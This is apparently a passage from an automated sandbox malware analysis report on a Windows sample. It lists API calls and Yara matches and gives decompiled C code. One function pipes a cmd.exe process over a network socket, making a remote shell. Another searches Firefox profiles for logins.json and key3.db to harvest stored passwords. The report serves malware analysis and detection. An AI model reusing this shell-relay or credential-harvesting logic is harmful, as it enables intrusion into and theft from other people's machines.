                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,?,?,?,00000000,00000001), ref: 004106D0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004106DC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000000,0041B310,00000000,00000002,0041B310,?), ref: 00410713
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00410720
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00410730
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 00410740
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00410750
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0041075A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000005E), ref: 00410774
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410780
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041078C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410795
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041079E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107A7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107B0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004107C2
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00416A54), ref: 004107D6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 004107E8
                                  • FindFirstFileW.KERNEL32(00000000), ref: 004107EF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898), ref: 00410817
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 00410824
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410830
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00410850
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041085A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410866
                                  • FindNextFileW.KERNEL32(?,?), ref: 0041087C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A28), ref: 00410898
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0041089F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004108AB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004108CB
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004108D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004108E1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004108FC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000005D), ref: 00410911
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041091A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041092B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410934
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@std@@$??0?$basic_string@G@2@@std@@$V?$basic_string@$Hstd@@V01@@$V10@0@$D@1@@D@2@@0@$?c_str@?$basic_string@G@2@@0@$?length@?$basic_string@V01@$??4?$basic_string@FileG@1@@V12@$??9std@@?begin@?$basic_string@?data@?$basic_string@?size@?$basic_string@?substr@?$basic_string@FindV10@$?end@?$basic_string@?find@?$basic_string@CreateFirstNextY?$basic_string@
                                  • String ID:
                                  • API String ID: 2968164691-0
                                  • Opcode ID: e95933ea7ba9c6570efcdd47d76262577301e1a728fb3cd3377a8fb22446724f
                                  • Instruction ID: 811b7e3e4f446b35303200f11341a1ba311440e0dd0279f7ab7bb97a8af00616
                                  • Opcode Fuzzy Hash: e95933ea7ba9c6570efcdd47d76262577301e1a728fb3cd3377a8fb22446724f
                                  • Instruction Fuzzy Hash: C3B11D72D0050DEBCB04EBA0EC59EEEB77CAF54345F148066F516A30A1EB745A89CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402B8A, Relevance: 75.5, APIs: 41, Strings: 2, Instructions: 291pipesleepfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E00402B8A(char _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				void _v16;
				signed int _v20;
				long _v24;
				long _v28;
				void* _v44;
				char _v60;
				char _v76;
				char* _t54;
				int _t68;
				void* _t79;
				CHAR* _t80;
				int _t91;
				signed int _t120;
				void* _t136;
				CHAR* _t142;
				void* _t146;

				if(( *0x41b85c & 0x00000001) != 0) {
					_t142 = 0;
				} else {
					 *0x41b85c =  *0x41b85c | 0x00000001;
					_t142 = 0;
					E00402010(0x41b800, 0);
					E00413E72(E00402F89);
				}
				if(( *0x41b85c & 0x00000002) == 0) {
					 *0x41b85c =  *0x41b85c | 0x00000002;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
					E00413E72(E00402F7E);
				}
				_t50 =  &_v5;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z(_t50);
				_v20 = _v20 | 0xffffffff;
				_v16 = _t142;
				if( *0x41b888 != 0) {
					L12:
					_v24 = _t142;
					PeekNamedPipe( *0x41b858, _t142, _t142, _t142,  &_v24, _t142);
					if(_v24 <= _t142) {
						_t146 = _t146 - 0x10;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v9);
						_t54 = E004020C2(0x41b800, 0x62, 0x415664);
						_v20 = _t54;
					} else {
						_t136 = malloc(_v24);
						_t54 = ReadFile( *0x41b858, _t136, _v24,  &_v28, _t142);
						if(_v28 > _t142) {
							if(_v16 <= _t142) {
								L18:
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t136,  &_v7);
								_t146 = _t146 - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z(_t142, _v28,  &_v8);
								_t54 = E004020C2(0x41b800, 0x62,  &_v76);
								_v20 = _t54;
							} else {
								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
								_t68 = strncmp(_t136, _t54, _v16);
								_t146 = _t146 + 0xc;
								if(_t68 != 0) {
									goto L18;
								} else {
									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t136,  &_v5);
									_t146 = _t146 - 0x10;
									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z(_v16, _v28 - _v16,  &_v6);
									_t54 = E004020C2(0x41b800, 0x62,  &_v60);
									_v20 = _t54;
								}
							}
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						}
						free(_t136);
					}
					goto L22;
				} else {
					__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(0x41b860, "cmd.exe");
					if(_t50 == 0) {
						L11:
						if( *0x41b888 != 0) {
							do {
								goto L12;
								L22:
								if(_v20 == 0xffffffff) {
									 *0x41b889 =  *0x41b889 & 0x00000000;
								}
								__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
								if(_t54 <= 0) {
									_v16 = _t142;
								} else {
									__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415770);
									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(0x41b860);
									__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
									WriteFile( *0x41b870,  &_v16,  &_v16,  &_v16, _t142);
									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
								}
								Sleep(0x64);
							} while ( *0x41b889 != 0);
							TerminateProcess(0x41b878->hProcess, _t142);
							CloseHandle( *0x41b87c);
							_t50 = CloseHandle( *0x41b878);
						}
						E004020F4(_t50, 0x41b800);
						CloseHandle( *0x41b858);
						CloseHandle( *0x41b874);
						 *0x41b888 =  *0x41b888 & 0x00000000;
						_t91 = 1;
					} else {
						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(getenv("SystemDrive"));
						__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415774);
						0x41b7f0->nLength = 0xc;
						 *0x41b7f8 = 1;
						 *0x41b7f4 = _t142;
						if(CreatePipe(0x41b7a0, 0x41b870, 0x41b7f0, _t142) == 0 || CreatePipe(0x41b858, 0x41b874, 0x41b7f0, _t142) == 0) {
							_t91 = 0;
						} else {
							_t120 = 0x11;
							memset(0x41b7a8, 0, _t120 << 2);
							_t79 =  *0x41b7a0; // 0x0
							 *0x41b7e0 = _t79;
							_t80 =  *0x41b874; // 0x0
							0x41b7a8->cb = 0x44;
							 *0x41b7d4 = 0x101;
							 *0x41b7d8 = _t142;
							 *0x41b7e4 = _t80;
							 *0x41b7e8 = _t80;
							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
							 *0x41b888 = CreateProcessA(_t142, _t80, _t142, _t142, 1, _t142, _t142, _t80, 0x41b7a8, 0x41b878) & 0xffffff00 | _t81 != 0x00000000;
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z();
							 *0x41b889 = 1;
							E00402038(0x41b800);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E0040209B(0x41b800, 0x415664);
							_t146 = _t146 + 0xc;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
							_v20 = E004020C2(0x41b800, 0x93,  &_a4);
							Sleep(0x12c);
							_t142 = 0;
							goto L11;
						}
					}
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t91;
			}
























                                  0x00402b9f
                                  0x00402bbf
                                  0x00402ba1
                                  0x00402ba1
                                  0x00402ba8
                                  0x00402bad
                                  0x00402bb7
                                  0x00402bbc
                                  0x00402bc8
                                  0x00402bca
                                  0x00402bdc
                                  0x00402be7
                                  0x00402bec
                                  0x00402bf4
                                  0x00402bfb
                                  0x00402c01
                                  0x00402c0c
                                  0x00402c0f
                                  0x00402d86
                                  0x00402d94
                                  0x00402d97
                                  0x00402da0
                                  0x00402e77
                                  0x00402e85
                                  0x00402e8f
                                  0x00402e94
                                  0x00402da6
                                  0x00402db0
                                  0x00402dc1
                                  0x00402dca
                                  0x00402dd3
                                  0x00402e33
                                  0x00402e3b
                                  0x00402e41
                                  0x00402e52
                                  0x00402e5c
                                  0x00402e61
                                  0x00402dd5
                                  0x00402ddb
                                  0x00402de3
                                  0x00402de9
                                  0x00402dee
                                  0x00000000
                                  0x00402df0
                                  0x00402df8
                                  0x00402dfe
                                  0x00402e15
                                  0x00402e1f
                                  0x00402e24
                                  0x00402e27
                                  0x00402dee
                                  0x00402e67
                                  0x00402e67
                                  0x00402e6e
                                  0x00402e74
                                  0x00000000
                                  0x00402c15
                                  0x00402c1f
                                  0x00402c29
                                  0x00402d79
                                  0x00402d80
                                  0x00402d86
                                  0x00000000
                                  0x00402e97
                                  0x00402e9b
                                  0x00402e9d
                                  0x00402e9d
                                  0x00402eab
                                  0x00402eb3
                                  0x00402f02
                                  0x00402eb5
                                  0x00402ebc
                                  0x00402eca
                                  0x00402ed7
                                  0x00402ee0
                                  0x00402eed
                                  0x00402efa
                                  0x00402efa
                                  0x00402f07
                                  0x00402f0d
                                  0x00402f21
                                  0x00402f33
                                  0x00402f3b
                                  0x00402f3b
                                  0x00402f47
                                  0x00402f52
                                  0x00402f5a
                                  0x00402f5c
                                  0x00402f63
                                  0x00402c2f
                                  0x00402c3e
                                  0x00402c4b
                                  0x00402c67
                                  0x00402c71
                                  0x00402c7b
                                  0x00402c85
                                  0x00402e2c
                                  0x00402ca5
                                  0x00402cac
                                  0x00402cb6
                                  0x00402cb8
                                  0x00402cbe
                                  0x00402cc3
                                  0x00402ccd
                                  0x00402cd7
                                  0x00402ce1
                                  0x00402ce8
                                  0x00402ced
                                  0x00402cf2
                                  0x00402d06
                                  0x00402d20
                                  0x00402d25
                                  0x00402d2d
                                  0x00402d34
                                  0x00402d45
                                  0x00402d46
                                  0x00402d47
                                  0x00402d48
                                  0x00402d49
                                  0x00402d4e
                                  0x00402d57
                                  0x00402d6e
                                  0x00402d71
                                  0x00402d77
                                  0x00000000
                                  0x00402d77
                                  0x00402c85
                                  0x00402c29
                                  0x00402f68
                                  0x00402f71
                                  0x00402f7d

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                  • getenv.MSVCRT ref: 00402C34
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                  • CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                  • CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                  • CreateProcessA.KERNEL32(00000000,00000000), ref: 00402D0E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00402D25
                                    • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • Sleep.KERNEL32(0000012C,00000093), ref: 00402D71
                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402D97
                                  • malloc.MSVCRT ref: 00402DA9
                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00402DC1
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402DDB
                                  • strncmp.MSVCRT(00000000,00000000), ref: 00402DE3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402DF8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?), ref: 00402E15
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402E3B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?), ref: 00402E52
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000062), ref: 00402E67
                                  • free.MSVCRT(00000000), ref: 00402E6E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00402E85
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402D57
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000062), ref: 00402EAB
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415770), ref: 00402EBC
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0041B860), ref: 00402ECA
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 00402ED7
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402EE0
                                  • WriteFile.KERNEL32(00000000), ref: 00402EED
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00402EFA
                                  • Sleep.KERNEL32(00000064), ref: 00402F07
                                  • TerminateProcess.KERNEL32(00000000), ref: 00402F21
                                  • CloseHandle.KERNEL32 ref: 00402F33
                                  • CloseHandle.KERNEL32 ref: 00402F3B
                                  • CloseHandle.KERNEL32 ref: 00402F52
                                  • CloseHandle.KERNEL32 ref: 00402F5A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F68
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F71
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@$D@1@@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseHandle$CreatePipeV01@@$?length@?$basic_string@FileProcessSleepY?$basic_string@$??8std@@D@2@@0@NamedPeekReadTerminateV?$basic_string@Writeconnectfreegetenvmallocstrncmp
                                  • String ID: SystemDrive$cmd.exe
                                  • API String ID: 1882443052-3633465311
                                  • Opcode ID: 798ad6d736d95c7b07d7848c9617aa5a37f0631a69e3a682c11b69c6be7a4bd8
                                  • Instruction ID: 0121bb856768c0d2b30f6d73f3edf8f7852bc9241180a475d7ad49acf624a365
                                  • Opcode Fuzzy Hash: 798ad6d736d95c7b07d7848c9617aa5a37f0631a69e3a682c11b69c6be7a4bd8
                                  • Instruction Fuzzy Hash: 97B1A531A40209EFCB01AB61DD4DAEE7FB9EB84750F14803AF911A61E0CBB84945DBDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040728F, Relevance: 75.5, APIs: 37, Strings: 6, Instructions: 206fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 004072A1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072AE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072BB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 004072CD
                                  • getenv.MSVCRT ref: 004072D9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 004072E5
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004072F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407303
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040731D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 00407327
                                  • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 0040732E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040733A
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00407348
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],00000000), ref: 0040735C
                                    • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                    • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 0040737F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?), ref: 0040741E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?), ref: 0040742B
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?), ref: 00407437
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407440
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407449
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407463
